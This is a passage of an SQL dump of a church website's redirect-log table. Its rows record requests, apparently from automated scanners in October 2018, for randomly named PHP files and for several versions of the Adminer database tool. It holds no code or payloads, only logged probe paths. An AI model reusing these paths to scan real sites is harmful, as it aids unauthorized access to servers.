(9469, 'https://www.lifeoasisinternationalchurch.org/uw.php', NULL, '', '', 2, 0, '2018-10-08 22:11:50', '0000-00-00 00:00:00', 301),
(9470, 'https://www.lifeoasisinternationalchurch.org/pi.php', NULL, '', '', 2, 0, '2018-10-08 22:18:53', '0000-00-00 00:00:00', 301),
(9471, 'https://www.lifeoasisinternationalchurch.org/vh.php', NULL, '', '', 2, 0, '2018-10-08 22:26:00', '0000-00-00 00:00:00', 301),
(9472, 'https://www.lifeoasisinternationalchurch.org/pq.php', NULL, '', '', 2, 0, '2018-10-08 22:33:08', '0000-00-00 00:00:00', 301),
(9473, 'https://www.lifeoasisinternationalchurch.org/bw.php', NULL, '', '', 2, 0, '2018-10-08 22:40:07', '0000-00-00 00:00:00', 301),
(9474, 'https://www.lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/holy+spirit', NULL, '', '', 1, 0, '2018-10-08 22:40:53', '0000-00-00 00:00:00', 301),
(9475, 'https://www.lifeoasisinternationalchurch.org/wr.php', NULL, '', '', 2, 0, '2018-10-08 22:47:12', '0000-00-00 00:00:00', 301),
(9476, 'https://www.lifeoasisinternationalchurch.org/yp.php', NULL, '', '', 2, 0, '2018-10-08 22:54:11', '0000-00-00 00:00:00', 301),
(9477, 'https://www.lifeoasisinternationalchurch.org/cb.php', NULL, '', '', 2, 0, '2018-10-08 23:08:23', '0000-00-00 00:00:00', 301),
(9478, 'https://www.lifeoasisinternationalchurch.org/fb.php', NULL, '', '', 2, 0, '2018-10-08 23:15:30', '0000-00-00 00:00:00', 301),
(9479, 'https://www.lifeoasisinternationalchurch.org/oy.php', NULL, '', '', 2, 0, '2018-10-08 23:22:32', '0000-00-00 00:00:00', 301),
(9480, 'https://www.lifeoasisinternationalchurch.org/zb.php', NULL, '', '', 2, 0, '2018-10-08 23:29:32', '0000-00-00 00:00:00', 301),
(9481, 'https://www.lifeoasisinternationalchurch.org/po.php', NULL, '', '', 2, 0, '2018-10-08 23:36:36', '0000-00-00 00:00:00', 301),
(9482, 'https://www.lifeoasisinternationalchurch.org/pd.php', NULL, '', '', 2, 0, '2018-10-08 23:43:39', '0000-00-00 00:00:00', 301),
(9483, 'https://www.lifeoasisinternationalchurch.org/qm.php', NULL, '', '', 2, 0, '2018-10-08 23:50:43', '0000-00-00 00:00:00', 301),
(9484, 'https://www.lifeoasisinternationalchurch.org/rj.php', NULL, '', '', 2, 0, '2018-10-08 23:57:44', '0000-00-00 00:00:00', 301),
(9485, 'https://www.lifeoasisinternationalchurch.org/oj.php', NULL, '', '', 2, 0, '2018-10-09 00:04:52', '0000-00-00 00:00:00', 301),
(9486, 'https://www.lifeoasisinternationalchurch.org/iv.php', NULL, '', '', 2, 0, '2018-10-09 00:11:53', '0000-00-00 00:00:00', 301),
(9487, 'https://www.lifeoasisinternationalchurch.org/gj.php', NULL, '', '', 2, 0, '2018-10-09 00:18:51', '0000-00-00 00:00:00', 301),
(9488, 'https://www.lifeoasisinternationalchurch.org/yl.php', NULL, '', '', 2, 0, '2018-10-09 00:25:55', '0000-00-00 00:00:00', 301),
(9489, 'https://www.lifeoasisinternationalchurch.org/pb.php', NULL, '', '', 2, 0, '2018-10-09 00:32:50', '0000-00-00 00:00:00', 301),
(9490, 'https://www.lifeoasisinternationalchurch.org/fv.php', NULL, '', '', 2, 0, '2018-10-09 00:39:48', '0000-00-00 00:00:00', 301),
(9491, 'https://www.lifeoasisinternationalchurch.org/yz.php', NULL, '', '', 2, 0, '2018-10-09 00:46:47', '0000-00-00 00:00:00', 301),
(9492, 'https://www.lifeoasisinternationalchurch.org/ps.php', NULL, '', '', 2, 0, '2018-10-09 00:53:43', '0000-00-00 00:00:00', 301),
(9493, 'https://www.lifeoasisinternationalchurch.org/tt.php', NULL, '', '', 2, 0, '2018-10-09 01:00:50', '0000-00-00 00:00:00', 301),
(9494, 'https://www.lifeoasisinternationalchurch.org/gp.php', NULL, '', '', 2, 0, '2018-10-09 01:07:56', '0000-00-00 00:00:00', 301),
(9495, 'https://www.lifeoasisinternationalchurch.org/ik.php', NULL, '', '', 2, 0, '2018-10-09 01:15:03', '0000-00-00 00:00:00', 301),
(9496, 'https://www.lifeoasisinternationalchurch.org/wx.php', NULL, '', '', 2, 0, '2018-10-09 01:22:14', '0000-00-00 00:00:00', 301),
(9497, 'https://www.lifeoasisinternationalchurch.org/fe.php', NULL, '', '', 2, 0, '2018-10-09 01:29:23', '0000-00-00 00:00:00', 301),
(9498, 'https://www.lifeoasisinternationalchurch.org/tq.php', NULL, '', '', 2, 0, '2018-10-09 01:36:36', '0000-00-00 00:00:00', 301),
(9499, 'https://www.lifeoasisinternationalchurch.org/de.php', NULL, '', '', 2, 0, '2018-10-09 01:43:44', '0000-00-00 00:00:00', 301),
(9500, 'https://www.lifeoasisinternationalchurch.org/om.php', NULL, '', '', 2, 0, '2018-10-09 01:50:53', '0000-00-00 00:00:00', 301),
(9501, 'https://www.lifeoasisinternationalchurch.org/md.php', NULL, '', '', 2, 0, '2018-10-09 01:57:56', '0000-00-00 00:00:00', 301),
(9502, 'https://www.lifeoasisinternationalchurch.org/hx.php', NULL, '', '', 2, 0, '2018-10-09 02:05:03', '0000-00-00 00:00:00', 301),
(9503, 'https://www.lifeoasisinternationalchurch.org/zr.php', NULL, '', '', 2, 0, '2018-10-09 02:12:05', '0000-00-00 00:00:00', 301),
(9504, 'https://www.lifeoasisinternationalchurch.org/bc.php', NULL, '', '', 2, 0, '2018-10-09 02:19:12', '0000-00-00 00:00:00', 301),
(9505, 'https://www.lifeoasisinternationalchurch.org/ub.php', NULL, '', '', 2, 0, '2018-10-09 02:26:19', '0000-00-00 00:00:00', 301),
(9506, 'https://www.lifeoasisinternationalchurch.org/sn.php', NULL, '', '', 2, 0, '2018-10-09 02:33:25', '0000-00-00 00:00:00', 301),
(9507, 'https://www.lifeoasisinternationalchurch.org/et.php', NULL, '', '', 2, 0, '2018-10-09 02:40:33', '0000-00-00 00:00:00', 301),
(9508, 'https://www.lifeoasisinternationalchurch.org/wf.php', NULL, '', '', 2, 0, '2018-10-09 02:47:41', '0000-00-00 00:00:00', 301),
(9509, 'https://www.lifeoasisinternationalchurch.org/ww.php', NULL, '', '', 2, 0, '2018-10-09 03:02:03', '0000-00-00 00:00:00', 301),
(9510, 'https://www.lifeoasisinternationalchurch.org/hq.php', NULL, '', '', 2, 0, '2018-10-09 03:09:06', '0000-00-00 00:00:00', 301),
(9511, 'https://www.lifeoasisinternationalchurch.org/zo.php', NULL, '', '', 2, 0, '2018-10-09 03:16:13', '0000-00-00 00:00:00', 301),
(9512, 'https://www.lifeoasisinternationalchurch.org/lg.php', NULL, '', '', 2, 0, '2018-10-09 03:23:19', '0000-00-00 00:00:00', 301),
(9513, 'https://www.lifeoasisinternationalchurch.org/ai.php', NULL, '', '', 2, 0, '2018-10-09 03:30:23', '0000-00-00 00:00:00', 301),
(9514, 'https://www.lifeoasisinternationalchurch.org/yc.php', NULL, '', '', 2, 0, '2018-10-09 03:37:26', '0000-00-00 00:00:00', 301),
(9515, 'https://www.lifeoasisinternationalchurch.org/ge.php', NULL, '', '', 2, 0, '2018-10-09 03:44:26', '0000-00-00 00:00:00', 301),
(9516, 'https://www.lifeoasisinternationalchurch.org/nm.php', NULL, '', '', 2, 0, '2018-10-09 03:51:36', '0000-00-00 00:00:00', 301),
(9517, 'https://www.lifeoasisinternationalchurch.org/xw.php', NULL, '', '', 2, 0, '2018-10-09 03:58:40', '0000-00-00 00:00:00', 301),
(9518, 'https://www.lifeoasisinternationalchurch.org/rq.php', NULL, '', '', 2, 0, '2018-10-09 04:05:43', '0000-00-00 00:00:00', 301),
(9519, 'https://www.lifeoasisinternationalchurch.org/vj.php', NULL, '', '', 2, 0, '2018-10-09 04:36:32', '0000-00-00 00:00:00', 301),
(9520, 'https://www.lifeoasisinternationalchurch.org/mg.php', NULL, '', '', 2, 0, '2018-10-09 04:43:38', '0000-00-00 00:00:00', 301),
(9521, 'https://www.lifeoasisinternationalchurch.org/qr.php', NULL, '', '', 2, 0, '2018-10-09 04:50:45', '0000-00-00 00:00:00', 301),
(9522, 'https://www.lifeoasisinternationalchurch.org/jf.php', NULL, '', '', 2, 0, '2018-10-09 04:57:50', '0000-00-00 00:00:00', 301),
(9523, 'https://www.lifeoasisinternationalchurch.org/tl.php', NULL, '', '', 2, 0, '2018-10-09 05:04:51', '0000-00-00 00:00:00', 301),
(9524, 'https://lifeoasisinternationalchurch.org/59047c1c921/0', NULL, '', '', 1, 0, '2018-10-09 05:10:57', '0000-00-00 00:00:00', 301),
(9525, 'https://www.lifeoasisinternationalchurch.org/bu.php', NULL, '', '', 2, 0, '2018-10-09 05:11:51', '0000-00-00 00:00:00', 301),
(9526, 'https://www.lifeoasisinternationalchurch.org/af.php', NULL, '', '', 2, 0, '2018-10-09 05:19:00', '0000-00-00 00:00:00', 301),
(9527, 'https://www.lifeoasisinternationalchurch.org/wd.php', NULL, '', '', 2, 0, '2018-10-09 05:25:59', '0000-00-00 00:00:00', 301),
(9528, 'https://www.lifeoasisinternationalchurch.org/xg.php', NULL, '', '', 2, 0, '2018-10-09 05:33:03', '0000-00-00 00:00:00', 301),
(9529, 'https://www.lifeoasisinternationalchurch.org/dy.php', NULL, '', '', 2, 0, '2018-10-09 05:39:58', '0000-00-00 00:00:00', 301),
(9530, 'https://www.lifeoasisinternationalchurch.org/pa.php', NULL, '', '', 2, 0, '2018-10-09 05:46:53', '0000-00-00 00:00:00', 301),
(9531, 'https://www.lifeoasisinternationalchurch.org/hc.php', NULL, '', '', 2, 0, '2018-10-09 05:53:58', '0000-00-00 00:00:00', 301),
(9532, 'https://www.lifeoasisinternationalchurch.org/lr.php', NULL, '', '', 2, 0, '2018-10-09 06:01:05', '0000-00-00 00:00:00', 301),
(9533, 'https://www.lifeoasisinternationalchurch.org/mi.php', NULL, '', '', 2, 0, '2018-10-09 06:08:11', '0000-00-00 00:00:00', 301),
(9534, 'https://www.lifeoasisinternationalchurch.org/dtreaming', NULL, '', '', 2, 0, '2018-10-09 16:35:29', '0000-00-00 00:00:00', 301),
(9535, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=7lowc_nmpvy', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-10-09 21:20:35', '0000-00-00 00:00:00', 301),
(9536, 'https://lifeoasisinternationalchurch.org/adminer1.php', NULL, '', '', 3, 0, '2018-10-10 02:08:39', '0000-00-00 00:00:00', 301),
(9537, 'https://lifeoasisinternationalchurch.org/adminer-4.3.1.php', NULL, '', '', 5, 0, '2018-10-10 02:08:40', '0000-00-00 00:00:00', 301),
(9538, 'https://lifeoasisinternationalchurch.org/adminer-4.6.2.php', NULL, '', '', 4, 0, '2018-10-10 02:08:42', '0000-00-00 00:00:00', 301),
(9539, 'https://lifeoasisinternationalchurch.org/adminer-4.6.1.php', NULL, '', '', 4, 0, '2018-10-10 02:08:43', '0000-00-00 00:00:00', 301),
(9540, 'https://lifeoasisinternationalchurch.org/adminer-4.6.0.php', NULL, '', '', 4, 0, '2018-10-10 02:08:45', '0000-00-00 00:00:00', 301),
(9541, 'https://lifeoasisinternationalchurch.org/adminer-4.5.0.php', NULL, '', '', 4, 0, '2018-10-10 02:08:46', '0000-00-00 00:00:00', 301),
(9542, 'https://lifeoasisinternationalchurch.org/adminer-4.4.0.php', NULL, '', '', 4, 0, '2018-10-10 02:08:48', '0000-00-00 00:00:00', 301),
(9543, 'https://lifeoasisinternationalchurch.org/adminer-4.3.0.php', NULL, '', '', 4, 0, '2018-10-10 02:08:49', '0000-00-00 00:00:00', 301),
(9544, 'https://www.lifeoasisinternationalchurch.org/language/en-gb/3x22upx.php', NULL, '', '', 1, 0, '2018-10-10 09:42:44', '0000-00-00 00:00:00', 301),
(9545, 'https://www.lifeoasisinternationalchurch.org/jb.php', NULL, '', '', 2, 0, '2018-10-10 14:32:11', '0000-00-00 00:00:00', 301),
(9546, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=162&task=calendar&month=4&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-10 14:32:22', '0000-00-00 00:00:00', 301),
(9547, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=752', NULL, '', '', 1, 0, '2018-10-10 14:34:17', '0000-00-00 00:00:00', 301),
(9548, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=730&task=calendar&month=3&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-10 14:42:37', '0000-00-00 00:00:00', 301),
(9549, 'https://www.lifeoasisinternationalchurch.org/ut.php', NULL, '', '', 2, 0, '2018-10-10 14:43:15', '0000-00-00 00:00:00', 301),
(9550, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=158&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-10 14:43:34', '0000-00-00 00:00:00', 301),
(9551, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=770&task=calendar&month=6&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-10 14:50:14', '0000-00-00 00:00:00', 301),
(9552, 'https://www.lifeoasisinternationalchurch.org/xj.php', NULL, '', '', 2, 0, '2018-10-10 14:54:06', '0000-00-00 00:00:00', 301),
(9553, 'https://lifeoasisinternationalchurch.org/component/users/?view=396&itemid=101', NULL, '', '', 1, 0, '2018-10-10 14:58:08', '0000-00-00 00:00:00', 301),
(9554, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=896&itemid=101', NULL, '', '', 1, 0, '2018-10-10 15:00:06', '0000-00-00 00:00:00', 301),
(9555, 'https://www.lifeoasisinternationalchurch.org/lw.php', NULL, '', '', 2, 0, '2018-10-10 15:05:11', '0000-00-00 00:00:00', 301),
(9556, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=942&task=calendar&month=4&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-10 15:09:15', '0000-00-00 00:00:00', 301),
(9557, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=100&task=calendar&month=9&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-10 15:09:16', '0000-00-00 00:00:00', 301),
(9558, 'https://www.lifeoasisinternationalchurch.org/jr.php', NULL, '', '', 2, 0, '2018-10-10 15:15:35', '0000-00-00 00:00:00', 301),
(9559, 'https://www.lifeoasisinternationalchurch.org/gt.php', NULL, '', '', 2, 0, '2018-10-10 15:26:26', '0000-00-00 00:00:00', 301),
(9560, 'https://www.lifeoasisinternationalchurch.org/du.php', NULL, '', '', 2, 0, '2018-10-10 15:37:23', '0000-00-00 00:00:00', 301),
(9561, 'https://www.lifeoasisinternationalchurch.org/xe.php', NULL, '', '', 2, 0, '2018-10-10 15:48:04', '0000-00-00 00:00:00', 301),
(9562, 'https://www.lifeoasisinternationalchurch.org/ef.php', NULL, '', '', 2, 0, '2018-10-10 15:58:56', '0000-00-00 00:00:00', 301),
(9563, 'https://www.lifeoasisinternationalchurch.org/sl.php', NULL, '', '', 2, 0, '2018-10-10 16:10:12', '0000-00-00 00:00:00', 301),
(9564, 'https://www.lifeoasisinternationalchurch.org/bv.php', NULL, '', '', 2, 0, '2018-10-10 16:21:37', '0000-00-00 00:00:00', 301),
(9565, 'https://www.lifeoasisinternationalchurch.org/rv.php', NULL, '', '', 2, 0, '2018-10-10 16:32:58', '0000-00-00 00:00:00', 301),
(9566, 'https://www.lifeoasisinternationalchurch.org/wj.php', NULL, '', '', 2, 0, '2018-10-10 16:45:42', '0000-00-00 00:00:00', 301),
(9567, 'https://www.lifeoasisinternationalchurch.org/ky.php', NULL, '', '', 2, 0, '2018-10-10 16:56:28', '0000-00-00 00:00:00', 301),
(9568, 'https://www.lifeoasisinternationalchurch.org/od.php', NULL, '', '', 2, 0, '2018-10-10 17:08:01', '0000-00-00 00:00:00', 301),
(9569, 'https://www.lifeoasisinternationalchurch.org/qq.php', NULL, '', '', 2, 0, '2018-10-10 17:19:07', '0000-00-00 00:00:00', 301),
(9570, 'https://www.lifeoasisinternationalchurch.org/pv.php', NULL, '', '', 2, 0, '2018-10-10 17:30:43', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(9571, 'https://www.lifeoasisinternationalchurch.org/td.php', NULL, '', '', 2, 0, '2018-10-10 17:53:46', '0000-00-00 00:00:00', 301),
(9572, 'https://www.lifeoasisinternationalchurch.org/kh.php', NULL, '', '', 2, 0, '2018-10-10 18:05:33', '0000-00-00 00:00:00', 301),
(9573, 'https://www.lifeoasisinternationalchurch.org/pl.php', NULL, '', '', 2, 0, '2018-10-10 18:17:14', '0000-00-00 00:00:00', 301),
(9574, 'https://www.lifeoasisinternationalchurch.org/hb.php', NULL, '', '', 2, 0, '2018-10-10 18:29:02', '0000-00-00 00:00:00', 301),
(9575, 'https://www.lifeoasisinternationalchurch.org/ei.php', NULL, '', '', 2, 0, '2018-10-10 18:40:34', '0000-00-00 00:00:00', 301),
(9576, 'https://www.lifeoasisinternationalchurch.org/cj.php', NULL, '', '', 2, 0, '2018-10-10 18:52:16', '0000-00-00 00:00:00', 301),
(9577, 'https://www.lifeoasisinternationalchurch.org/dg.php', NULL, '', '', 2, 0, '2018-10-10 19:04:42', '0000-00-00 00:00:00', 301),
(9578, 'https://www.lifeoasisinternationalchurch.org/el.php', NULL, '', '', 2, 0, '2018-10-10 19:28:20', '0000-00-00 00:00:00', 301),
(9579, 'https://www.lifeoasisinternationalchurch.org/qi.php', NULL, '', '', 2, 0, '2018-10-10 19:40:08', '0000-00-00 00:00:00', 301),
(9580, 'https://www.lifeoasisinternationalchurch.org/kp.php', NULL, '', '', 2, 0, '2018-10-10 19:51:50', '0000-00-00 00:00:00', 301),
(9581, 'https://www.lifeoasisinternationalchurch.org/ea.php', NULL, '', '', 2, 0, '2018-10-10 20:03:42', '0000-00-00 00:00:00', 301),
(9582, 'https://www.lifeoasisinternationalchurch.org/br.php', NULL, '', '', 2, 0, '2018-10-10 20:15:54', '0000-00-00 00:00:00', 301),
(9583, 'https://www.lifeoasisinternationalchurch.org/iz.php', NULL, '', '', 2, 0, '2018-10-10 20:27:25', '0000-00-00 00:00:00', 301),
(9584, 'https://www.lifeoasisinternationalchurch.org/wg.php', NULL, '', '', 2, 0, '2018-10-10 20:39:01', '0000-00-00 00:00:00', 301),
(9585, 'https://www.lifeoasisinternationalchurch.org/lp.php', NULL, '', '', 2, 0, '2018-10-10 20:50:37', '0000-00-00 00:00:00', 301),
(9586, 'https://www.lifeoasisinternationalchurch.org/zv.php', NULL, '', '', 2, 0, '2018-10-10 21:14:58', '0000-00-00 00:00:00', 301),
(9587, 'https://www.lifeoasisinternationalchurch.org/dj.php', NULL, '', '', 2, 0, '2018-10-10 21:27:20', '0000-00-00 00:00:00', 301),
(9588, 'https://www.lifeoasisinternationalchurch.org/uy.php', NULL, '', '', 2, 0, '2018-10-10 21:39:28', '0000-00-00 00:00:00', 301),
(9589, 'https://www.lifeoasisinternationalchurch.org/wm.php', NULL, '', '', 2, 0, '2018-10-10 21:51:26', '0000-00-00 00:00:00', 301),
(9590, 'https://www.lifeoasisinternationalchurch.org/ee.php', NULL, '', '', 2, 0, '2018-10-10 22:04:08', '0000-00-00 00:00:00', 301),
(9591, 'https://www.lifeoasisinternationalchurch.org/ve.php', NULL, '', '', 2, 0, '2018-10-10 22:16:33', '0000-00-00 00:00:00', 301),
(9592, 'https://www.lifeoasisinternationalchurch.org/xh.php', NULL, '', '', 2, 0, '2018-10-10 22:29:10', '0000-00-00 00:00:00', 301),
(9593, 'https://www.lifeoasisinternationalchurch.org/jn.php', NULL, '', '', 2, 0, '2018-10-10 22:41:40', '0000-00-00 00:00:00', 301),
(9594, 'https://www.lifeoasisinternationalchurch.org/pp.php', NULL, '', '', 2, 0, '2018-10-10 23:06:30', '0000-00-00 00:00:00', 301),
(9595, 'https://www.lifeoasisinternationalchurch.org/nv.php', NULL, '', '', 2, 0, '2018-10-10 23:18:53', '0000-00-00 00:00:00', 301),
(9596, 'https://www.lifeoasisinternationalchurch.org/ae.php', NULL, '', '', 2, 0, '2018-10-10 23:31:19', '0000-00-00 00:00:00', 301),
(9597, 'https://www.lifeoasisinternationalchurch.org/oa.php', NULL, '', '', 2, 0, '2018-10-10 23:43:44', '0000-00-00 00:00:00', 301),
(9598, 'https://www.lifeoasisinternationalchurch.org/tw.php', NULL, '', '', 2, 0, '2018-10-10 23:55:44', '0000-00-00 00:00:00', 301),
(9599, 'https://www.lifeoasisinternationalchurch.org/ch.php', NULL, '', '', 2, 0, '2018-10-11 00:08:31', '0000-00-00 00:00:00', 301),
(9600, 'https://www.lifeoasisinternationalchurch.org/bl.php', NULL, '', '', 2, 0, '2018-10-11 00:33:40', '0000-00-00 00:00:00', 301),
(9601, 'https://www.lifeoasisinternationalchurch.org/pj.php', NULL, '', '', 2, 0, '2018-10-11 00:46:34', '0000-00-00 00:00:00', 301),
(9602, 'https://www.lifeoasisinternationalchurch.org/qc.php', NULL, '', '', 2, 0, '2018-10-11 00:59:30', '0000-00-00 00:00:00', 301),
(9603, 'https://www.lifeoasisinternationalchurch.org/ke.php', NULL, '', '', 2, 0, '2018-10-11 01:12:28', '0000-00-00 00:00:00', 301),
(9604, 'https://www.lifeoasisinternationalchurch.org/xo.php', NULL, '', '', 2, 0, '2018-10-11 01:24:59', '0000-00-00 00:00:00', 301),
(9605, 'https://www.lifeoasisinternationalchurch.org/sg.php', NULL, '', '', 2, 0, '2018-10-11 01:37:54', '0000-00-00 00:00:00', 301),
(9606, 'https://www.lifeoasisinternationalchurch.org/gq.php', NULL, '', '', 2, 0, '2018-10-11 01:50:26', '0000-00-00 00:00:00', 301),
(9607, 'https://www.lifeoasisinternationalchurch.org/qj.php', NULL, '', '', 2, 0, '2018-10-11 02:02:39', '0000-00-00 00:00:00', 301),
(9608, 'https://www.lifeoasisinternationalchurch.org/pg.php', NULL, '', '', 2, 0, '2018-10-11 02:14:44', '0000-00-00 00:00:00', 301),
(9609, 'https://www.lifeoasisinternationalchurch.org/py.php', NULL, '', '', 2, 0, '2018-10-11 02:27:28', '0000-00-00 00:00:00', 301),
(9610, 'https://www.lifeoasisinternationalchurch.org/cz.php', NULL, '', '', 2, 0, '2018-10-11 02:40:15', '0000-00-00 00:00:00', 301),
(9611, 'https://www.lifeoasisinternationalchurch.org/ip.php', NULL, '', '', 2, 0, '2018-10-11 03:06:20', '0000-00-00 00:00:00', 301),
(9612, 'https://www.lifeoasisinternationalchurch.org/hw.php', NULL, '', '', 2, 0, '2018-10-11 03:18:51', '0000-00-00 00:00:00', 301),
(9613, 'https://www.lifeoasisinternationalchurch.org/qo.php', NULL, '', '', 2, 0, '2018-10-11 03:31:29', '0000-00-00 00:00:00', 301),
(9614, 'https://www.lifeoasisinternationalchurch.org/xk.php', NULL, '', '', 2, 0, '2018-10-11 03:43:39', '0000-00-00 00:00:00', 301),
(9615, 'https://www.lifeoasisinternationalchurch.org/ce.php', NULL, '', '', 2, 0, '2018-10-11 04:08:55', '0000-00-00 00:00:00', 301),
(9616, 'https://www.lifeoasisinternationalchurch.org/xi.php', NULL, '', '', 2, 0, '2018-10-11 04:22:14', '0000-00-00 00:00:00', 301),
(9617, 'https://www.lifeoasisinternationalchurch.org/em.php', NULL, '', '', 2, 0, '2018-10-11 04:49:05', '0000-00-00 00:00:00', 301),
(9618, 'https://www.lifeoasisinternationalchurch.org/mc.php', NULL, '', '', 2, 0, '2018-10-11 05:01:33', '0000-00-00 00:00:00', 301),
(9619, 'https://www.lifeoasisinternationalchurch.org/zg.php', NULL, '', '', 2, 0, '2018-10-11 05:14:20', '0000-00-00 00:00:00', 301),
(9620, 'https://www.lifeoasisinternationalchurch.org/gz.php', NULL, '', '', 2, 0, '2018-10-11 05:26:02', '0000-00-00 00:00:00', 301),
(9621, 'https://www.lifeoasisinternationalchurch.org/rr.php', NULL, '', '', 2, 0, '2018-10-11 05:37:44', '0000-00-00 00:00:00', 301),
(9622, 'https://www.lifeoasisinternationalchurch.org/hh.php', NULL, '', '', 2, 0, '2018-10-11 05:49:42', '0000-00-00 00:00:00', 301),
(9623, 'https://www.lifeoasisinternationalchurch.org/wq.php', NULL, '', '', 2, 0, '2018-10-11 06:13:39', '0000-00-00 00:00:00', 301),
(9624, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=438&task=calendar&month=6&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-11 13:34:22', '0000-00-00 00:00:00', 301),
(9625, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=136&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-11 13:40:59', '0000-00-00 00:00:00', 301),
(9626, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming?id=324', NULL, '', '', 1, 0, '2018-10-11 13:42:40', '0000-00-00 00:00:00', 301),
(9627, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=892', NULL, '', '', 3, 0, '2018-10-11 13:43:23', '0000-00-00 00:00:00', 301),
(9628, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=80', NULL, '', '', 1, 0, '2018-10-11 13:46:01', '0000-00-00 00:00:00', 301),
(9629, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=70', NULL, '', '', 1, 0, '2018-10-11 13:47:57', '0000-00-00 00:00:00', 301),
(9630, 'https://lifeoasisinternationalchurch.org/component/users/?view=596&itemid=101', NULL, '', '', 1, 0, '2018-10-11 13:53:33', '0000-00-00 00:00:00', 301),
(9631, 'https://www.lifeoasisinternationalchurch.org/adipisicing-elite?id=854', NULL, '', '', 1, 0, '2018-10-11 13:54:44', '0000-00-00 00:00:00', 301),
(9632, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=300&itemid=101', NULL, '', '', 2, 0, '2018-10-11 13:55:59', '0000-00-00 00:00:00', 301),
(9633, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=470&task=calendar&month=4&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-11 14:01:04', '0000-00-00 00:00:00', 301),
(9634, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=kwpainzcthy', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-10-11 15:21:25', '0000-00-00 00:00:00', 301),
(9635, 'https://www.lifeoasisinternationalchurch.org/streamimg', NULL, '', '', 3, 0, '2018-10-11 16:05:46', '0000-00-00 00:00:00', 301),
(9636, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=pdvfhlhrsts', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-10-11 20:43:17', '0000-00-00 00:00:00', 301),
(9637, 'https://www.lifeoasisinternationalchurch.org/adipisicing-elite?id=392', NULL, '', '', 1, 0, '2018-10-12 13:42:58', '0000-00-00 00:00:00', 301),
(9638, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=970&task=calendar&month=5&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-12 13:48:15', '0000-00-00 00:00:00', 301),
(9639, 'https://lifeoasisinternationalchurch.org/component/users/?view=64&itemid=101', NULL, '', '', 1, 0, '2018-10-12 13:48:23', '0000-00-00 00:00:00', 301),
(9640, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=104&task=calendar&month=6&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-12 14:03:28', '0000-00-00 00:00:00', 301),
(9641, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=626', NULL, '', '', 1, 0, '2018-10-12 14:03:53', '0000-00-00 00:00:00', 301),
(9642, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=220&task=calendar&month=9&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-12 14:09:36', '0000-00-00 00:00:00', 301),
(9643, 'https://www.lifeoasisinternationalchurch.org/message.php', NULL, '', '', 11, 0, '2018-10-13 05:03:52', '0000-00-00 00:00:00', 301),
(9644, 'https://lifeoasisinternationalchurch.org/pe', NULL, '', '', 1, 0, '2018-10-13 09:09:10', '0000-00-00 00:00:00', 301),
(9645, 'https://lifeoasisinternationalchurch.org/peri', NULL, '', '', 1, 0, '2018-10-13 09:09:11', '0000-00-00 00:00:00', 301),
(9646, 'https://lifeoasisinternationalchurch.org/per', NULL, '', '', 1, 0, '2018-10-13 09:09:12', '0000-00-00 00:00:00', 301),
(9647, 'https://lifeoasisinternationalchurch.org/peris', NULL, '', '', 1, 0, '2018-10-13 09:09:13', '0000-00-00 00:00:00', 301),
(9648, 'https://lifeoasisinternationalchurch.org/perisc', NULL, '', '', 1, 0, '2018-10-13 09:09:14', '0000-00-00 00:00:00', 301),
(9649, 'https://www.lifeoasisinternationalchurch.org/adipisicing-elite?id=606', NULL, '', '', 1, 0, '2018-10-13 13:55:51', '0000-00-00 00:00:00', 301),
(9650, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=274&task=calendar&month=9&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-13 13:57:13', '0000-00-00 00:00:00', 301),
(9651, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=386&task=calendar&month=2&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-13 14:01:13', '0000-00-00 00:00:00', 301),
